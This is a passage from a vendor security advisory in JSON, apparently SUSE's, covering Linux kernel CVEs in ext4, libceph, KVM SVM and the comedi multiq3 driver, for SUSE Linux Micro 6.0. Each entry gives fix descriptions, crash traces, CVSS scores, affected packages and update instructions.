"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68257"
},
{
"cve": "CVE-2025-68258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncomedi: multiq3: sanitize config options in multiq3_attach()\n\nSyzbot identified an issue [1] in multiq3_attach() that induces a\ntask timeout due to open() or COMEDI_DEVCONFIG ioctl operations,\nspecifically, in the case of multiq3 driver.\n\nThis problem arose when syzkaller managed to craft weird configuration\noptions used to specify the number of channels in encoder subdevice.\nIf a particularly great number is passed to s-\u003en_chan in\nmultiq3_attach() via it-\u003eoptions[2], then multiple calls to\nmultiq3_encoder_reset() at the end of driver-specific attach() method\nwill be running for minutes, thus blocking tasks and affected devices\nas well.\n\nWhile this issue is most likely not too dangerous for real-life\ndevices, it still makes sense to sanitize configuration inputs. Enable\na sensible limit on the number of encoder chips (4 chips max, each\nwith 2 channels) to stop this behaviour from manifesting.\n\n[1] Syzbot crash:\nINFO: task syz.2.19:6067 blocked for more than 143 seconds.\n...\nCall Trace:\n \u003cTASK\u003e\n context_switch kernel/sched/core.c:5254 [inline]\n __schedule+0x17c4/0x4d60 kernel/sched/core.c:6862\n __schedule_loop kernel/sched/core.c:6944 [inline]\n schedule+0x165/0x360 kernel/sched/core.c:6959\n schedule_preempt_disabled+0x13/0x30 kernel/sched/core.c:7016\n __mutex_lock_common kernel/locking/mutex.c:676 [inline]\n __mutex_lock+0x7e6/0x1350 kernel/locking/mutex.c:760\n comedi_open+0xc0/0x590 drivers/comedi/comedi_fops.c:2868\n chrdev_open+0x4cc/0x5e0 fs/char_dev.c:414\n do_dentry_open+0x953/0x13f0 fs/open.c:965\n vfs_open+0x3b/0x340 fs/open.c:1097\n...",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68258",
"url": "https://www.suse.com/security/cve/CVE-2025-68258"
},
{
"category": "external",
"summary": "SUSE Bug 1255182 for CVE-2025-68258",
"url": "https://bugzilla.suse.com/1255182"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68258"
},
{
"cve": "CVE-2025-68259",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68259"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: SVM: Don\u0027t skip unrelated instruction if INT3/INTO is replaced\n\nWhen re-injecting a soft interrupt from an INT3, INT0, or (select) INTn\ninstruction, discard the exception and retry the instruction if the code\nstream is changed (e.g. by a different vCPU) between when the CPU\nexecutes the instruction and when KVM decodes the instruction to get the\nnext RIP.\n\nAs effectively predicted by commit 6ef88d6e36c2 (\"KVM: SVM: Re-inject\nINT3/INTO instead of retrying the instruction\"), failure to verify that\nthe correct INTn instruction was decoded can effectively clobber guest\nstate due to decoding the wrong instruction and thus specifying the\nwrong next RIP.\n\nThe bug most often manifests as \"Oops: int3\" panics on static branch\nchecks in Linux guests. Enabling or disabling a static branch in Linux\nuses the kernel\u0027s \"text poke\" code patching mechanism. To modify code\nwhile other CPUs may be executing that code, Linux (temporarily)\nreplaces the first byte of the original instruction with an int3 (opcode\n0xcc), then patches in the new code stream except for the first byte,\nand finally replaces the int3 with the first byte of the new code\nstream. If a CPU hits the int3, i.e. executes the code while it\u0027s being\nmodified, then the guest kernel must look up the RIP to determine how to\nhandle the #BP, e.g. by emulating the new instruction. If the RIP is\nincorrect, then this lookup fails and the guest kernel panics.\n\nThe bug reproduces almost instantly by hacking the guest kernel to\nrepeatedly check a static branch[1] while running a drgn script[2] on\nthe host to constantly swap out the memory containing the guest\u0027s TSS.\n\n[1]: https://gist.github.com/osandov/44d17c51c28c0ac998ea0334edf90b5a\n[2]: https://gist.github.com/osandov/10e45e45afa29b11e0c7209247afc00b",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68259",
"url": "https://www.suse.com/security/cve/CVE-2025-68259"
},
{
"category": "external",
"summary": "SUSE Bug 1255199 for CVE-2025-68259",
"url": "https://bugzilla.suse.com/1255199"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68259"
},
{
"cve": "CVE-2025-68261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: add i_data_sem protection in ext4_destroy_inline_data_nolock()\n\nFix a race between inline data destruction and block mapping.\n\nThe function ext4_destroy_inline_data_nolock() changes the inode data\nlayout by clearing EXT4_INODE_INLINE_DATA and setting EXT4_INODE_EXTENTS.\nAt the same time, another thread may execute ext4_map_blocks(), which\ntests EXT4_INODE_EXTENTS to decide whether to call ext4_ext_map_blocks()\nor ext4_ind_map_blocks().\n\nWithout i_data_sem protection, ext4_ind_map_blocks() may receive inode\nwith EXT4_INODE_EXTENTS flag and triggering assert.\n\nkernel BUG at fs/ext4/indirect.c:546!\nEXT4-fs (loop2): unmounting filesystem.\ninvalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014\nRIP: 0010:ext4_ind_map_blocks.cold+0x2b/0x5a fs/ext4/indirect.c:546\n\nCall Trace:\n \u003cTASK\u003e\n ext4_map_blocks+0xb9b/0x16f0 fs/ext4/inode.c:681\n _ext4_get_block+0x242/0x590 fs/ext4/inode.c:822\n ext4_block_write_begin+0x48b/0x12c0 fs/ext4/inode.c:1124\n ext4_write_begin+0x598/0xef0 fs/ext4/inode.c:1255\n ext4_da_write_begin+0x21e/0x9c0 fs/ext4/inode.c:3000\n generic_perform_write+0x259/0x5d0 mm/filemap.c:3846\n ext4_buffered_write_iter+0x15b/0x470 fs/ext4/file.c:285\n ext4_file_write_iter+0x8e0/0x17f0 fs/ext4/file.c:679\n call_write_iter include/linux/fs.h:2271 [inline]\n do_iter_readv_writev+0x212/0x3c0 fs/read_write.c:735\n do_iter_write+0x186/0x710 fs/read_write.c:861\n vfs_iter_write+0x70/0xa0 fs/read_write.c:902\n iter_file_splice_write+0x73b/0xc90 fs/splice.c:685\n do_splice_from fs/splice.c:763 [inline]\n direct_splice_actor+0x10f/0x170 fs/splice.c:950\n splice_direct_to_actor+0x33a/0xa10 fs/splice.c:896\n do_splice_direct+0x1a9/0x280 fs/splice.c:1002\n do_sendfile+0xb13/0x12c0 fs/read_write.c:1255\n __do_sys_sendfile64 fs/read_write.c:1323 [inline]\n __se_sys_sendfile64 fs/read_write.c:1309 [inline]\n __x64_sys_sendfile64+0x1cf/0x210 fs/read_write.c:1309\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_64+0x35/0x80 arch/x86/entry/common.c:81\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68261",
"url": "https://www.suse.com/security/cve/CVE-2025-68261"
},
{
"category": "external",
"summary": "SUSE Bug 1255164 for CVE-2025-68261",
"url": "https://bugzilla.suse.com/1255164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68261"
},
{
"cve": "CVE-2025-68264",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68264"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: refresh inline data size before write operations\n\nThe cached ei-\u003ei_inline_size can become stale between the initial size\ncheck and when ext4_update_inline_data()/ext4_create_inline_data() use\nit. Although ext4_get_max_inline_size() reads the correct value at the\ntime of the check, concurrent xattr operations can modify i_inline_size\nbefore ext4_write_lock_xattr() is acquired.\n\nThis causes ext4_update_inline_data() and ext4_create_inline_data() to\nwork with stale capacity values, leading to a BUG_ON() crash in\next4_write_inline_data():\n\n kernel BUG at fs/ext4/inline.c:1331!\n BUG_ON(pos + len \u003e EXT4_I(inode)-\u003ei_inline_size);\n\nThe race window:\n1. ext4_get_max_inline_size() reads i_inline_size = 60 (correct)\n2. Size check passes for 50-byte write\n3. [Another thread adds xattr, i_inline_size changes to 40]\n4. ext4_write_lock_xattr() acquires lock\n5. ext4_update_inline_data() uses stale i_inline_size = 60\n6. Attempts to write 50 bytes but only 40 bytes actually available\n7. BUG_ON() triggers\n\nFix this by recalculating i_inline_size via ext4_find_inline_data_nolock()\nimmediately after acquiring xattr_sem. This ensures ext4_update_inline_data()\nand ext4_create_inline_data() work with current values that are protected\nfrom concurrent modifications.\n\nThis is similar to commit a54c4613dac1 (\"ext4: fix race writing to an\ninline_data file while its xattrs are changing\") which fixed i_inline_off\nstaleness. This patch addresses the related i_inline_size staleness issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68264",
"url": "https://www.suse.com/security/cve/CVE-2025-68264"
},
{
"category": "external",
"summary": "SUSE Bug 1255380 for CVE-2025-68264",
"url": "https://bugzilla.suse.com/1255380"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68264"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the 